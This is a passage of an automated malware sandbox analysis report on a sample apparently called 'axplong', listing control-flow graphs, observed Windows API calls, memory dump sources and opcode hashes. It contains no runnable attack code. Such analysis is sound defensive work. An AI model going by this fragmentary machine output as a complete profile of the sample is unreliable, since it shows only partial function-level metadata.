                                        APIs
                                        • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00436E23
                                        • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00436E7D
                                        • __dosmaperr.LIBCMT ref: 00436F12
                                          • Part of subcall function 00437177: __dosmaperr.LIBCMT ref: 004371AC
                                        Similarity
                                        • API ID: File__dosmaperr$HandleInformationType
                                        • String ID:
                                        • API String ID: 2531987475-0
                                        • Opcode ID: 68ecb1ab37866ab99bb11ce9c88822cc33227497e16e7586a78bdd0a05a16db6
                                        • Instruction ID: 66dac64a4f261cd34776ec1095d8f6b83c2048261d02eb10cefc1d88089432cb
                                        • Opcode Fuzzy Hash: 68ecb1ab37866ab99bb11ce9c88822cc33227497e16e7586a78bdd0a05a16db6
                                        • Instruction Fuzzy Hash: 47415D75900205BBDB24EFB5EC459ABBBF9EF88304B11952EF556D3210E638A904CB25

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1378 43d4f4-43d515 call 41deb0 1381 43d517 1378->1381 1382 43d52f-43d532 1378->1382 1383 43d519-43d51f 1381->1383 1384 43d54e-43d55a call 43a688 1381->1384 1382->1384 1385 43d534-43d537 1382->1385 1387 43d543-43d54c call 43d43c 1383->1387 1388 43d521-43d525 1383->1388 1396 43d564-43d570 call 43d47e 1384->1396 1397 43d55c-43d55f 1384->1397 1385->1387 1389 43d539-43d53c 1385->1389 1400 43d58c-43d595 1387->1400 1388->1384 1392 43d527-43d52b 1388->1392 1393 43d572-43d582 call 437443 call 436b8a 1389->1393 1394 43d53e-43d541 1389->1394 1392->1393 1398 43d52d 1392->1398 1393->1397 1394->1387 1394->1393 1396->1393 1411 43d584-43d589 1396->1411 1401 43d6cb-43d6da 1397->1401 1398->1387 1404 43d5a2-43d5b3 1400->1404 1405 43d597-43d59f call 438c8b 1400->1405 1409 43d5b5-43d5c7 1404->1409 1410 43d5c9 1404->1410 1405->1404 1414 43d5cb-43d5dc 1409->1414 1410->1414 1411->1400 1415 43d64a-43d65a call 43d687 1414->1415 1416 43d5de-43d5e0 1414->1416 1427 43d6c9 1415->1427 1428 43d65c-43d65e 1415->1428 1418 43d5e6-43d5e8 1416->1418 1419 43d6db-43d6dd 1416->1419 1421 43d5f4-43d600 1418->1421 1422 43d5ea-43d5ed 1418->1422 1423 43d6e7-43d6fa call 43651d 1419->1423 1424 43d6df-43d6e6 call 438cd3 1419->1424 1430 43d602-43d617 call 43d4eb * 2 1421->1430 1431 43d640-43d648 1421->1431 1422->1421 1429 43d5ef-43d5f2 1422->1429 1444 43d708-43d70e 1423->1444 1445 43d6fc-43d706 1423->1445 1424->1423 1427->1401 1434 43d660-43d676 call 43a531 1428->1434 1435 43d699-43d6a2 1428->1435 1429->1421 1436 43d61a-43d61c 1429->1436 1430->1436 1431->1415 1454 43d6a5-43d6a8 1434->1454 1435->1454 1436->1431 1438 43d61e-43d62e 1436->1438 1443 43d630-43d635 1438->1443 1443->1415 1449 43d637-43d63e 1443->1449 1451 43d710-43d711 1444->1451 1452 43d727-43d738 RtlAllocateHeap 1444->1452 1445->1444 1450 43d73c-43d747 call 437443 1445->1450 1449->1443 1462 43d749-43d74b 1450->1462 1451->1452 1455 43d713-43d71a call 439c81 1452->1455 1456 43d73a 1452->1456 1459 
43d6b4-43d6bc 1454->1459 1460 43d6aa-43d6ad 1454->1460 1455->1450 1468 43d71c-43d725 call 438cf9 1455->1468 1456->1462 1459->1427 1465 43d6be-43d6c6 call 43a531 1459->1465 1460->1459 1464 43d6af-43d6b2 1460->1464 1464->1427 1464->1459 1465->1427 1468->1450 1468->1452
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: hpGC
                                        • API String ID: 0-3687489864
                                        • Opcode ID: ddd3190556338c3d13818b7ced33b76726a6a14bcc24770c5eb8960b46649a3f
                                        • Instruction ID: aea530a4c474ee2df773fe41081c301fc368a2494489c52d42208a92f3998772
                                        • Opcode Fuzzy Hash: ddd3190556338c3d13818b7ced33b76726a6a14bcc24770c5eb8960b46649a3f
                                        • Instruction Fuzzy Hash: A2612672D00214ABDF259FA8F8866EEB7B0AF5D319F24612BE454A7350D7388C01CB5E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1472 4082b0-408331 call 434020 1476 408333-408338 1472->1476 1477 40833d-408365 call 417870 call 405b20 1472->1477 1478 40847f-40849b call 41cf21 1476->1478 1485 408367 1477->1485 1486 408369-40838b call 417870 call 405b20 1477->1486 1485->1486 1491 40838d 1486->1491 1492 40838f-4083a8 1486->1492 1491->1492 1495 4083d9-408404 1492->1495 1496 4083aa-4083b9 1492->1496 1497 408431-408452 1495->1497 1498 408406-408415 1495->1498 1499 4083bb-4083c9 1496->1499 1500 4083cf-4083d6 call 41d593 1496->1500 1504 408454-408456 GetNativeSystemInfo 1497->1504 1505 408458-40845d 1497->1505 1502 408427-40842e call 41d593 1498->1502 1503 408417-408425 1498->1503 1499->1500 1506 40849c-4084a1 call 436b9a 1499->1506 1500->1495 1502->1497 1503->1502 1503->1506 1510 40845e-408465 1504->1510 1505->1510 1510->1478 1514 408467-40846f 1510->1514 1515 408471-408476 1514->1515 1516 408478-40847b 1514->1516 1515->1478 1516->1478 1517 40847d 1516->1517 1517->1478
                                        APIs
                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 00408454
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoNativeSystem
                                        • String ID:
                                        • API String ID: 1721193555-0
                                        • Opcode ID: d626654a65a42354bbc7b6c64a40c9a5777633f9d88448e4e216e3b1317f4be6
                                        • Instruction ID: 43761fb483e5d2f1715a3f771a4cbac2680b13be870cbeec4c847210e353bd33
                                        • Opcode Fuzzy Hash: d626654a65a42354bbc7b6c64a40c9a5777633f9d88448e4e216e3b1317f4be6
                                        • Instruction Fuzzy Hash: 19512870D04208ABEB14EF68CE45BDEB775DB45314F5042BEE844B72C1EF395A848B99

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1518 436c99-436ca5 1519 436ca7-436cc3 call 437430 call 437443 call 436b8a 1518->1519 1520 436cc4-436ce8 call 434020 1518->1520 1526 436d06-436d28 CreateFileW 1520->1526 1527 436cea-436d04 call 437430 call 437443 call 436b8a 1520->1527 1528 436d2a-436d2e call 436e01 1526->1528 1529 436d38-436d3f call 436d77 1526->1529 1550 436d72-436d76 1527->1550 1536 436d33-436d36 1528->1536 1540 436d40-436d42 1529->1540 1536->1540 1542 436d64-436d67 1540->1542 1543 436d44-436d61 call 434020 1540->1543 1546 436d70 1542->1546 1547 436d69-436d6f 1542->1547 1543->1542 1546->1550 1547->1546
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0a87a64f31fd4dbfaa0916928f8d21724aa07f892415060f3723ce2adca2d8af
                                        • Instruction ID: 7cdb8b7e8c8278730c9add57993826d9c0d4b611dc04c6fb00d2d3e3edf91d76
                                        • Opcode Fuzzy Hash: 0a87a64f31fd4dbfaa0916928f8d21724aa07f892415060f3723ce2adca2d8af
                                        • Instruction Fuzzy Hash: 4F217F71A012097AEB117B659C42B9F37299F4533CF229316F9343B2C1D7786D0196A9

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1552 436f71-436f87 1553 436f97-436fa7 1552->1553 1554 436f89-436f8d 1552->1554 1559 436fe7-436fea 1553->1559 1560 436fa9-436fbb SystemTimeToTzSpecificLocalTime 1553->1560 1554->1553 1555 436f8f-436f95 1554->1555 1556 436fec-436ff7 call 41cf21 1555->1556 1559->1556 1560->1559 1562 436fbd-436fdd call 436ff8 1560->1562 1564 436fe2-436fe5 1562->1564 1564->1556
                                        APIs
                                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00436FB3
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$LocalSpecificSystem
                                        • String ID:
                                        • API String ID: 2574697306-0
                                        • Opcode ID: 5a01727589e290f2436a533912c5c292fffbcc10ff456d2da3c6eea13f51b3e8
                                        • Instruction ID: 0f858af501730c99038429961c3c26a9ee4ca84e323eb1993ac50de5b0ed1dd2
                                        • Opcode Fuzzy Hash: 5a01727589e290f2436a533912c5c292fffbcc10ff456d2da3c6eea13f51b3e8
                                        • Instruction Fuzzy Hash: 031136B290020DBADB10DE91D984EDFB7BCAB0C314F219266E512E2180EB34EB458B65

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1565 43d6ef-43d6fa 1566 43d708-43d70e 1565->1566 1567 43d6fc-43d706 1565->1567 1569 43d710-43d711 1566->1569 1570 43d727-43d738 RtlAllocateHeap 1566->1570 1567->1566 1568 43d73c-43d747 call 437443 1567->1568 1576 43d749-43d74b 1568->1576 1569->1570 1572 43d713-43d71a call 439c81 1570->1572 1573 43d73a 1570->1573 1572->1568 1578 43d71c-43d725 call 438cf9 1572->1578 1573->1576 1578->1568 1578->1570
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0043A5ED,?,004374AE,?,00000000,?), ref: 0043D730
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: f282e2b7823cb6033aaf28996d67fd67198a3845bc2ba5f4e79b4842a319ffdf
                                        • Instruction ID: 4e07c5d8f8d354d0f1e07c46279c1aa42674ad15849b4d2cba94089b314ce510
                                        • Opcode Fuzzy Hash: f282e2b7823cb6033aaf28996d67fd67198a3845bc2ba5f4e79b4842a319ffdf
                                        • Instruction Fuzzy Hash: D0F0BB31E49125569B213A267C0165B77959B89760F257127FC0496281CB68DC0042E9

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 6e9a8a156124c647e1f92732b7ce958c887cdfd675f7e02ce7ca1f972c843353
                                        • Instruction ID: 56fdb827f95acd8da5a67dbf87cc311c7affdc1f3594a97fadd8d08855d06889
                                        • Opcode Fuzzy Hash: 6e9a8a156124c647e1f92732b7ce958c887cdfd675f7e02ce7ca1f972c843353
                                        • Instruction Fuzzy Hash: DAF0D671E00614BBC7007B699D0675E7B74E707B64F90035EE811672D1EA786A008BDB
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4fb9c200d6cee775470199f85781aabb6a02c962bd08e61ac4c6ac90eb259324
                                        • Instruction ID: 25bbce27e92a249f37e421a53e02193277ed59bd20e81437c8da01c7d81c1873
                                        • Opcode Fuzzy Hash: 4fb9c200d6cee775470199f85781aabb6a02c962bd08e61ac4c6ac90eb259324
                                        • Instruction Fuzzy Hash: AE217FEB24C1107E7142A19B2B54AF677BEE9D763133184A6F403C690AF2945F5D7131
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12f15e27632a817e55f08c66b70ec771088acb67126c75fc72ba04d972fb5d36
                                        • Instruction ID: fff9e43fb9bea6955b8728b343d068b045f74df750604670017d1ad67b5aee74
                                        • Opcode Fuzzy Hash: 12f15e27632a817e55f08c66b70ec771088acb67126c75fc72ba04d972fb5d36
                                        • Instruction Fuzzy Hash: 5A212CEB28C120BD3042A18B2B55AF6767EE9D7732331C4A7B407D590AF2985F5D7132
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c2ce61ea1fa7a09ff8fd15e6b39d6375c7b589dfa1ec73996f22e9772e875e49
                                        • Instruction ID: b29a2e5fddd89cf84f30cdfad0cf5c74c936bc92426c06d953b97c0952c04a73
                                        • Opcode Fuzzy Hash: c2ce61ea1fa7a09ff8fd15e6b39d6375c7b589dfa1ec73996f22e9772e875e49
                                        • Instruction Fuzzy Hash: 42213EEB28C1207D3042A18B2B69AF67A6EE9D777133184A7F407C5906B2985B5D7132
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5dfea17e3b373f1837258c3a915418ed31bb555a47788eb88e4130022aaf8dfc
                                        • Instruction ID: ad9b5c707ce10b108c5fa7fc2b6ace4deec01795460a8e8b0723448a60ca02fb
                                        • Opcode Fuzzy Hash: 5dfea17e3b373f1837258c3a915418ed31bb555a47788eb88e4130022aaf8dfc
                                        • Instruction Fuzzy Hash: 53215CEB28C120BD7042A58B2B58AF67B6EE9D76313318867F407C5906F2885B5D7132
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d3e1bc27c86ed5cb54d78d648ea75635053559661036775e4632dea29610a24
                                        • Instruction ID: 7eef0ff946991ff0c16638894456f12493b26b758e1e91dcb43aed447a2caf1a
                                        • Opcode Fuzzy Hash: 7d3e1bc27c86ed5cb54d78d648ea75635053559661036775e4632dea29610a24
                                        • Instruction Fuzzy Hash: FA21D4EB24C1107E7142A18B2B94AF67B7EE9D363133184A7F443C6506F2885F5E7132
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 417b75266a4959fabeab31c9389bf9beb591401c5118246736b541cf4f5f3955
                                        • Instruction ID: 55b27151759507764c296d3b2e9bd0a577481fa1570ad4611f44f7ed2d76576a
                                        • Opcode Fuzzy Hash: 417b75266a4959fabeab31c9389bf9beb591401c5118246736b541cf4f5f3955
                                        • Instruction Fuzzy Hash: F01193EB24C1147D3041A19B2B99BF67A6EE9D76313318467F403D6A07F2895F5D7032
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56af646dc3c502fcd4996c4a892a08376518df0d17073e23d92ac272d38b2f7f
                                        • Instruction ID: 1c6a9a01f915a62fa0d90bd5b4938e5e506128ce629a0f4051f033032fb4f4bb
                                        • Opcode Fuzzy Hash: 56af646dc3c502fcd4996c4a892a08376518df0d17073e23d92ac272d38b2f7f
                                        • Instruction Fuzzy Hash: 0D1184EB28D1207D3041A19B2B55AF6766EE9D76313318467B407C5907B2845B5D7032
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 13805c575c6f6d36563c7563e509133fb2211fa44caa19ae46520ae649afcd94
                                        • Instruction ID: 5b43dad28e3fdc6035d0cbb1b58695fe7f6436c3edd665c75605cf48c32c3edd
                                        • Opcode Fuzzy Hash: 13805c575c6f6d36563c7563e509133fb2211fa44caa19ae46520ae649afcd94
                                        • Instruction Fuzzy Hash: 2911B1EB28C1207D7042A18B2B58AF6776EE9D76313318467F403C6546F2C45B9D7032
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aefe2610a8d36a04883b9a71dc3106bf8ecfb5a83de0a631aabed040d8632362
                                        • Instruction ID: 9bb5e54c8a53d9d5d884094ca2fe1d5ba3da48cdfc18dacb39cbb8310979754c
                                        • Opcode Fuzzy Hash: aefe2610a8d36a04883b9a71dc3106bf8ecfb5a83de0a631aabed040d8632362
                                        • Instruction Fuzzy Hash: 751142EB28C1207D7042A18B2B99AF67B6EE9D767133184A7F407C5906F2C85F9D7132
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 932f08c7ff06977f8ad192ebc7d5a21d5273de32f025d52a521e8a89b68a2d4f
                                        • Instruction ID: 7788d55e1541e2d4c397ce7da5f83a4d583cdfa3130f26e0bc2898566e634cc9
                                        • Opcode Fuzzy Hash: 932f08c7ff06977f8ad192ebc7d5a21d5273de32f025d52a521e8a89b68a2d4f
                                        • Instruction Fuzzy Hash: CE01C8EB28C1107D714291972B956F67A6EE9D723133184A7F407C6906B2C45B4D7131
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f392f8bdd7b7e25bc4e1589c87748263271ea724549af87e73b9b9e99f956b1a
                                        • Instruction ID: 48487d03c25bed66784825553d3f26143ff4e4cae85c3f72ea002b5259425641
                                        • Opcode Fuzzy Hash: f392f8bdd7b7e25bc4e1589c87748263271ea724549af87e73b9b9e99f956b1a
                                        • Instruction Fuzzy Hash: 8E01B5D7288120BD2142609B2BD56F27B6EEDD76723328497F447C5A0BB1886F9AB035
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6e02d8f850a5743878696925682da1f4f27b6830c20828a35b03ddb0d6559da
                                        • Instruction ID: 038ce5db6ed1b9cbd64182b41175454d8ef9b638687b65f60b3a072318ea2ea0
                                        • Opcode Fuzzy Hash: e6e02d8f850a5743878696925682da1f4f27b6830c20828a35b03ddb0d6559da
                                        • Instruction Fuzzy Hash: ACF0BBDB2882107D2042A08B2B956F37A5FECD76723318497F007CA906B5D85B99B132
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2632540860.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_4b30000_axplong.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57b7110e21e87ed2a7029b5f7a4fe97d377e292552ca1c03769d8ffb6a36d462
                                        • Instruction ID: aba4cbabd563778fc0c63a0de1657d8cfc4f9a82f72a9ebe2744862d5fa50ab9
                                        • Opcode Fuzzy Hash: 57b7110e21e87ed2a7029b5f7a4fe97d377e292552ca1c03769d8ffb6a36d462
                                        • Instruction Fuzzy Hash: 10E092DB298110BA004361DB6AD63B13D9E6A2B6332314083A087C5A0531C92294B132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
